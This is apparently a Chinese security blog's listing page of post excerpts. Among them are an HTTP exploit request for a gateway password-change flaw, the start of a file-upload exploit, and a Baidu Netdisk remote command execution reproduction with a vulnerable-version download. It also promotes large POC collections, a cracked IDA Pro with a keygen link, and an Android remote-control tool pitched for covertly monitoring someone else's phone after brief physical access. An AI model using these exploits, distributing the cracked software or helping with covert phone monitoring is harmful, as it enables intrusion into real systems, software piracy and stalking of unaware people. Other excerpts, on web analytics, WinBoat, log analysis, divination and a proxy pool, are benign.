2025年最新的20W+的Nuclei-POC
1- 杨CC的评价> 是的,20W+的Nuclei-POC,没有之一。 > 非常牛而逼之。 > 不过,全部都是yaml文件格式的POC,毕竟是Nuclei,一些支持yaml格式的poc可以正常使用。 2- 分类介绍 我们先来看一下总体数量。 从这里可以 看到,总数量拥有208936个poc, 然后,我们再来把目录中的所有poc目录统计一下。 图1 图2 从图1和图2中,可以看到,POC分类有80+个。 而且我们通过观察目录可以发现,包含:adobe、apache、aws、cisco、cnnvd、cnvd、ftp、zfuz、ftp、git、http、java、mysql、nginx、oracle、php、python、ruby、sql、ssh、web、vmware、xss等多个poc分类。 我们下面会将不同的分类进行介绍。 3- 部分POC介绍3.1 adobe 数量上,我们来看下图 总数量,高达300+个poc。 然后我们来简单看一些poc。 adobe/SSRF-AEM-2018-12809.yaml 123456789101112131...
150个常见厂商的POC合集-包含部分exp
一、杨CC对工具的评价 部分来源于2023HW发现的漏洞POC,包含多个厂商。部分来源于公众号,部分来源于网络。 二、POC合集1、网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞POC 1234POST /changepass.php?type=2 Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@ 2、网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞123456789101112131415161718192021222324252627POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x...
Ustat-一个免费-好用-专业-不用实名的网站统计工具
1- 杨CC对工具的评价百度统计有的它全有,没有的,它也有。 google统计有的它也有。google统计没有,它当然有! 最重要的是好用、便宜、专业、不用实名。更何况,现在还有免费版! 为什么不用呢? 官网链接 ,或者使用教程的位置,都会官网链接. 2- 功能介绍 我们以当前网站统计为例,简单介绍下功能。 概览界面支持每天、每周、每月、每年的统计。 数据对比 趋势分析 实时访客 来源分析 访问分析 访客分析 搜索引擎 蜘蛛爬虫 访客列表 会话列表 访问IP 事件分析 页面热点 – 这个功能很实用,可以查看用户点击位置最多的位置。 图1: 图2: 说明:红色点越密集,说明点击率越高。也说明用户对这块比较感兴趣。 说明:点击率=点击次数/页面访问次数 一共就是这么一些功能,相当强大,功能齐全。 3- 使用方法 1.注册账号 点击:注册,访问官网。然后注册账号。如果此处链接不可用,请点击:官网链接 2.添加站点 注册登录后,点击右上角的图标,随后点击“添加” 添加完成后,会在主屏幕上显示出来你添加的网站。 3.获取代码 点...
Winboat-可以让Linux无缝运行Windows工具的软件
1- 杨CC对工具的评价 WinBoa - 最强Linux虚拟机,没有之一。 这款工具可以让你无缝运行Windows应用,当然也包括游戏。 2- 工具简单介绍 支持所有的Linux环境,包括但不限于:debian\Fedora\arch等多种Linux发行版。 您可以在ycc77.cn中的-其他工具-电脑工具中找到WinBoat,并使用它。 当然,如果您是arch的发行版,您就不需要去寻找其他连接了。 这一篇文章可以帮您完成该工具的构造。 好了,我们来看一下截图。 或者我们i来看夸克网盘。 很好用,非常不错。下面我们来正式开始安装。 3- 特性 说明:WinBoat 目前处于测试阶段,因此可能会偶尔遇到问题和错误。如果您决定尝试,应该能够适应一定程度的故障排除,但我们仍然鼓励您尝试一下。 特性: 🎨 优雅的界面:时尚直观的界面,将 Windows 无缝集成到您的 Linux 桌面环境中,让您感觉像原生体验 📦 自动安装:通过我们的界面进行简单的安装过程 - 选择您的偏好和规格,让我们处理其余部分 🚀 运行任何应用...
FastWLAT_高性能 Web 日志分析工具
1- 杨CC对工具的评价 该工具由AI编写99%以上的代码,支持Apache\Nginx\IIS\Tomcat等日志的分析,部分地方存在些BUG,但作为蓝队工具,还是比较不错的工具. github连接:https://github.com/vam876/FastWLAT 看图的话,上Github看图吧,我直接复制的. 2- FastWLAT功能介绍 最新版本:V1.0.1 更新日期: 2025/09/03 📊 智能仪表盘 - 访问第一目的了然 📥 强大导入系统 - 支持主流WEB日志格式 格式全覆盖:Apache、Nginx、IIS、Tomcat等日志格式 智能识别:自动格式检测 大文件处理: 百万级日志处理优化 清晰方式:文件上传、文本粘贴、示例数据体验快速 格式不兼容提供示例格式仅用于装备 🔍性能日志视图 - 百万条日志级响应 虚拟滚动:支持百万级日志浏览浏览 多视图模式: 表格、树状、聚合清晰视图 多层搜索:全文搜索、正则匹配、条件过滤 智能分页:动态加载,内存自动恢复 快速过滤功能:一键清除静态文件,一键排除40...
大六壬_基础中的基础
1- 杨CC评价 大六壬_基础中的基础,是六壬入门的第一步,也是最难的一步,因为六壬的起源,实在是太早了,以至于很多资料,都难以找到。,但是不知道从何入手,所以在网站上,添加了这个分类. 2- 大六壬起源. 大六壬起源,其实分为两个板块,其一为神话故事,其二为历史文献中。 2.1 神话起源 **在神话故事中,**相传黄帝与蚩尤大战时,因蚩尤实战了迷雾之术,导致黄帝陷入困境,此时九天玄女,授予黄帝:六壬式法,帮助其破敌。 这里需要注意,部分说法为九天玄女传授给皇帝的为:奇门遁甲。所以神话起源,我们暂且不再讨论。 2.2 历史起源 **而在历史文献中,**在《吴越春秋》《越绝书》等汉代文献记载了春秋时期的伍子胥、范蠡运用六壬占国事的实例。 具体案例如下: 伍子胥在公元前 494 年吴越战争中,以 “支上申金为鬼伤干” 的课式,预测吴王夫差伐齐将先胜后败,并劝谏越王勾践隐忍待机。 范蠡于公元前 494 年为勾践占 “天网课”,准确判断吴王不会赦免越国,建议长期韬晦。这些案例虽出自汉代文献,却逆向印证了六壬在先秦时期已形成系统理论。 同时在《汉书・艺文志》著录《大...
百度网盘Windows客户端远程命令执行漏洞复现
1- 杨CC对工具的评价 简单好用,但是需要将百度网盘的版本降低在7.59.5.14以下. 百度网盘7.59.5.104以下版本,存在命令执行漏洞 下载地址https://136892-1793258927.antpcdn.com:19001/b/pkg-ant.baidu.com/issue/netdisk/yunguanjia/BaiduNetdisk_7.59.5.104.exe 文章来源:https://www.n0o0b.com/archives/1756987096966 2- 漏洞利用说明 YunDetectService.exe默认开机自启,无需登录,会在10000端口监听,若被挤占则+1顺延 123# 命令说明netstat -ano | findstr 10000 # 检查10000端口tasklist | findstr 16124 # 检查是否运行YunDetectService , 也可以使用tasklist 查看相关进程 poc.xml 用于远程加载.可以使用python -m http.server运行 ...
IDA_PRO_9.2_破解版
1- 杨CC对工具的评价 该软件为:IDA_PRO_9.2最新破解版.逆向必备软件 2- 软件下载 访问:https://pan.quark.cn/s/21f13b2fff94 链接,进行下载. 文件中存在多个版本,分别为:MacOS\Linux\Windows 三个版本. 截图如下: 按照自己的系统版本下载即可 3- 破解教程 我们以Windows为例: 下载Windows版本,然后将:idakeygen.py,存放在安装目录 然后复制路径在终端中打开.运行python idakeygen.py 注意:在运行脚本前,一定要先运行一遍ida.exe,然后再次运行脚本.否则可能会出现错误. 注意:在运行脚本前,一定要先运行一遍ida.exe,然后再次运行脚本.否则可能会出现错误. 4- 截图实例 5- 结束语 需要技术文章,记得将ycc77.com 添加到书签栏哦~ 需要资源,记得将yancy77.cn 添加到书签栏哦~ B站: 疯狂的杨CC 抖音: 疯狂的杨CC 快手: 疯狂的杨CC 91: 疯狂的杨CC p站: 疯狂的杨CC
Yccol_开源代理池全套工具_包含_API_PRO_基础版_GUI版
1- 杨CC对工具的评价 YCCOL 代理池开源了,包含___API_PRO版本_基础版_GUI版,等多个版本,同时也包含了数据库信息验证,相对而言比较全面.理论来讲同样可商用. 开源地址:https://github.com/Sgyling/yccol 本项目使用:Apache License Version 2.0 条款. 免责条款 无担保承诺:明确软件以 “现状(AS IS)” 形式提供,ASF 及贡献者不提供任何明示或隐含的担保,比如不保证软件功能正常、无缺陷,也不保证软件能满足用户的特定需求(如商业场景下的稳定性、兼容性)。 限制损害赔偿:除法律强制要求的情形外,ASF 及贡献者不对因使用或无法使用软件造成的任何间接损害(如商业损失、数据丢失、业务中断等)承担赔偿责任,仅可能对直接损害承担责任(需符合法律规定)。 版权说明 保留基础声明:用户在使用、复制、分发(包括商用分发)或修改软件时,必须在软件的所有副本或衍生版本中,完整保留原始的版权声明文本、本协议条款声明,以及软件中包含的免责声明内容。 标注修改内容:若用户对软件进行了修改(如二次开发),需在修改部...
安卓远控_局域网_手机无提示(Windows控制安卓手机)
1- 杨CC对工具的评价 Windows远控安卓的一个工具,整体非常轻量化,基于adb进行远控,很好用,但是需要开启无线调试.并且需要在同一个WIFI下,才可使用,适合家庭内部的监控. 但是手机上会出现一个无线调试的任务栏按钮. 2- 功能介绍 软件下载地址:https://pan.quark.cn/s/8c8b3683663c 部分功能如下: 核心功能为: 屏幕监控\屏幕控制\屏幕截图\文件管理\终端调试\定时任务\安装app\打开app\上传文件\运行脚本等 按键分为: 切换键\主屏幕\返回键\关闭屏幕\电源键\音量控制\旋转屏幕等. 其他可接收的信息为: 电量\充电状态\设备温度\驱动来源\电压等 注意:上方包含了软件大部分功能. 部分功能截图如下: 大概就是上方的功能 3- 使用方式 首先你需要拿到对方手机约30秒的时间准备. 我这里以小米手机为例: 打开 设置 - > 我的设备 -> 连续点击OS版本10次,直到出现了截图的提示: 然后,打开回退到设置主界面 找到更多设置 -> 开发者选项 ->...


